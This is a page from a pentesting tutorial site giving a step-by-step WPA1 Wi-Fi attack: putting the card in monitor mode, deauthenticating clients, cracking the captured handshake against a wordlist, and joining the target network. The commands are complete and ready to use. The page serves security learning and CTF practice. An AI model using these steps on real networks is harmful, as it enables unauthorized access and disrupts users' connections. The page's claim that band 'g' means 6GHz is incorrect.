Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  • Capturing WPA1 Handshake and Cracking the Password
  • Prerequisites
  • Step-by-Step Process
  • Summary
  1. Wireless Security
  2. Intro to WiFi Pentesting

WPA-PSK Networks

Capturing WPA1 Handshake and Cracking the Password

In this section, we'll walk through the steps to capture a WPA1 4-way handshake and crack the password using a dictionary attack. The attack involves starting the wireless interface in monitor mode, gathering target network information, de-authenticating clients, and using tools like aircrack-ng to perform the crack.

Prerequisites

Ensure you have the following:

  • A wireless card that supports monitor mode.

  • The necessary tools: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and a wordlist (e.g., /usr/share/wordlists/rockyou.txt).

Step-by-Step Process

1. Start Interface in Monitor Mode and Kill Unwanted Services

Start by killing any processes that might interfere with your network scanning and then put your wireless interface into monitor mode:

airmon-ng check kill && airmon-ng start wlan0

  • airmon-ng check kill: Stops processes that could disrupt wireless scanning.

  • airmon-ng start wlan0: Puts your wireless interface (replace wlan0 with the correct interface name) into monitor mode (wlan0mon).

2. Gather Information About the Target Network

Next, scan for nearby wireless networks and gather information like the channel and BSSID of the target:

airodump-ng --band abg wlan0mon

  • airodump-ng: Scans for nearby networks.

  • --band abg: Scans for networks on the 2.4GHz (b), 5GHz (a), and 6GHz (g) bands.

  • wlan0mon: Your interface in monitor mode.

This command will display a list of available networks. Identify the target network and note the Channel and BSSID.

To capture the WPA1 4-way handshake, specify the BSSID and channel of the target network:

airodump-ng wlan0mon --bssid <bssid> -c <channel> -w WPA1

  • Replace <bssid> with the BSSID of the target network.

  • Replace <channel> with the channel number of the target network.

  • -w WPA1: Specifies the output filename for the captured data (WPA1-01.cap).

Keep this terminal running as it continuously monitors for the handshake.

4. Perform De-Authentication to Capture the Handshake

In another terminal, de-authenticate clients connected to the target network to force them to re-authenticate, which will trigger the 4-way handshake:

aireplay-ng -0 5 -a <bssid> wlan0mon

This should cause a connected client to disconnect and reconnect, providing the necessary handshake data.

  • -0 5: Sends 5 de-authentication packets.

  • -a <bssid>: Specifies the BSSID of the target network.

  • wlan0mon: The interface in monitor mode.

5. Crack the Handshake Using aircrack-ng

Once the handshake has been captured, you can use aircrack-ng to attempt to crack the password by performing a dictionary attack with a wordlist like rockyou.txt:

aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA1-01.cap

  • -w /usr/share/wordlists/rockyou.txt: Specifies the wordlist to use.

  • WPA1-01.cap: The captured handshake file.

If the password is found in the wordlist, aircrack-ng will display it.

6. Connect to the Network

Once you've successfully cracked the password, you can connect to the target network using wpa_supplicant. Create a wpa.conf file with the network details:

bashCopyEditnetwork={
  ssid="TargetNetworkName"
  psk="CrackedPassword"
}

Then, connect with:

wpa_supplicant -c wpa.conf

7. Obtain an IP Address

Next, request an IP address from the DHCP server:

bashCopyEditsudo dhclient wlan0 -v

Summary

By following these steps, you've captured a WPA1 4-way handshake, cracked the password using a dictionary attack, and connected to the network. This method is typically used in CTF challenges to simulate wireless network penetration and test WPA1 security.

PreviousWPSNextWPA & WPA2 PSK

Last updated 19 days ago